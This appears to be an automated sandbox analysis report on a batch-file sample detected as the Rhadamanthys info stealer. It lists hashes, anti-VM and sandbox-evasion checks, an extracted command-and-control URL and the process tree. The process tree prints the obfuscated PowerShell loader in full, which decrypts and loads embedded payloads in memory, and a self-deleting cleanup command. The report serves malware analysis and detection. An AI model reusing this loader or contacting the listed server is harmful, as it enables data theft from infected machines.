Analysis
-
max time kernel
52s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
19/04/2023, 16:07
Static task
static1
Behavioral task
behavioral1
Sample
10FpDvByrqvHWUgFegBMjMmEkh.bat
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
10FpDvByrqvHWUgFegBMjMmEkh.bat
Resource
win10v2004-20230220-en
General
-
Target
10FpDvByrqvHWUgFegBMjMmEkh.bat
-
Size
189KB
-
MD5
98b57df374d3888660dca7b8707aa9e5
-
SHA1
4afb4626817228104bd752ba38650cef356e9afc
-
SHA256
23f45fe1261dd687ee376dc36555a98b72ab76c70a330d8bd33e2bfa1d41aeb1
-
SHA512
a21e4b1af9ddc7731356109bc1f2f75615db963e34666216c46e7b14bf28ac7f7c8432c060a2b67335111cf434cefa90de0e79e9b7c54a996c38d1fc79f26931
-
SSDEEP
3072:jJ6sy+qsWPFiC5x1ElXP6RxLVYJdq7GOngOIxKtQPula2Mjr/L7pcTDlXMW5aOcT:hYs21xCIjLquDlIx91n/LCTDlXXHW
Malware Config
Extracted
rhadamanthys
http://185.224.129.51:8080/modlib/o6u3ke.661c
Signatures
-
Detect rhadamanthys stealer shellcode 3 IoCs
resource yara_rule behavioral2/memory/452-193-0x0000000006AC0000-0x0000000006ADC000-memory.dmp family_rhadamanthys behavioral2/memory/452-195-0x0000000006AC0000-0x0000000006ADC000-memory.dmp family_rhadamanthys behavioral2/memory/452-198-0x0000000006AC0000-0x0000000006ADC000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Executes dropped EXE 1 IoCs
pid Process 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 3664 powershell.exe 3664 powershell.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 952 powershell.exe 952 powershell.exe 952 powershell.exe 952 powershell.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3664 powershell.exe Token: SeDebugPrivilege 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeShutdownPrivilege 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe Token: SeCreatePagefilePrivilege 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4464 wrote to memory of 3664 4464 cmd.exe 84 PID 4464 wrote to memory of 3664 4464 cmd.exe 84 PID 4464 wrote to memory of 452 4464 cmd.exe 85 PID 4464 wrote to memory of 452 4464 cmd.exe 85 PID 4464 wrote to memory of 452 4464 cmd.exe 85 PID 452 wrote to memory of 952 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 89 PID 452 wrote to memory of 952 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 89 PID 452 wrote to memory of 952 452 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe 89
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe"C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe" function Dr($f){$f.Replace('AXQs', '')}$ezXk=Dr 'GeAXQstAXQsCuAXQsrAXQsrentAXQsPrAXQsocAXQsessAXQs';$Irdc=Dr 'ReAXQsadLiAXQsneAXQssAXQs';$GdQU=Dr 'InvAXQsokeAXQs';$oeNz=Dr 'FiAXQsrAXQssAXQstAXQs';$Skvh=Dr 'FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs';$Frss=Dr 'LoaAXQsdAXQs';$iCMB=Dr 'TAXQsrAXQsaAXQsnAXQssforAXQsmFAXQsinAXQsalAXQsBloAXQsckAXQs';$NIox=Dr 'CrAXQseaAXQstAXQseDeAXQscrAXQsyptAXQsorAXQs';$dXiP=Dr 'ChaAXQsngAXQseEAXQsxteAXQsnsiAXQsonAXQs';$Ethu=Dr 'EntrAXQsyAXQsPAXQsoAXQsinAXQstAXQs';function PiTFT($XOBWp,$PzVDp,$lwaqj){$zClni=[System.Security.Cryptography.Aes]::Create();$zClni.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zClni.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zClni.Key=[System.Convert]::$Skvh($PzVDp);$zClni.IV=[System.Convert]::$Skvh($lwaqj);$rFEvg=$zClni.$NIox();$WebjH=$rFEvg.$iCMB($XOBWp,0,$XOBWp.Length);$rFEvg.Dispose();$zClni.Dispose();$WebjH;}function WDCxf($XOBWp){$euCrm=New-Object System.IO.MemoryStream(,$XOBWp);$MDTEe=New-Object System.IO.MemoryStream;$wFbGM=New-Object System.IO.Compression.GZipStream($euCrm,[IO.Compression.CompressionMode]::Decompress);$wFbGM.CopyTo($MDTEe);$wFbGM.Dispose();$euCrm.Dispose();$MDTEe.Dispose();$MDTEe.ToArray();}function vGOdU($XOBWp,$PzVDp){[System.Reflection.Assembly]::$Frss([byte[]]$XOBWp).$Ethu.$GdQU($null,$PzVDp);}$ccWcY=[System.Linq.Enumerable]::$oeNz([System.IO.File]::$Irdc([System.IO.Path]::$dXiP([System.Diagnostics.Process]::$ezXk().MainModule.FileName, $null)));$lORZK = $ccWcY.Substring(3).Split('\');$xzfhv=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[0])) $lORZK[2] $lORZK[3]);$pmqpI=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[1])) $lORZK[2] $lORZK[3]);vGOdU $pmqpI $null;vGOdU $xzfhv $null;2⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks system information in the registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(452);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
15KB
MD514f535a89ae7a7ad8adc7ca3517bf190
SHA19577803b11d41263e25d054b57f3a681d0ed55ef
SHA25614e0ee5b3045a935c30813215a6a8faaad1bb86e3305a50e4ae6d05ba49469ce
SHA51272f9c9823262d72377063e5058067b1b8bdf5c541732ea9ded243407e45201c08152f7c7bac0f2359a0e1c95e38b7e383efac9499cd14dd49db3ccf2c1648f67
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82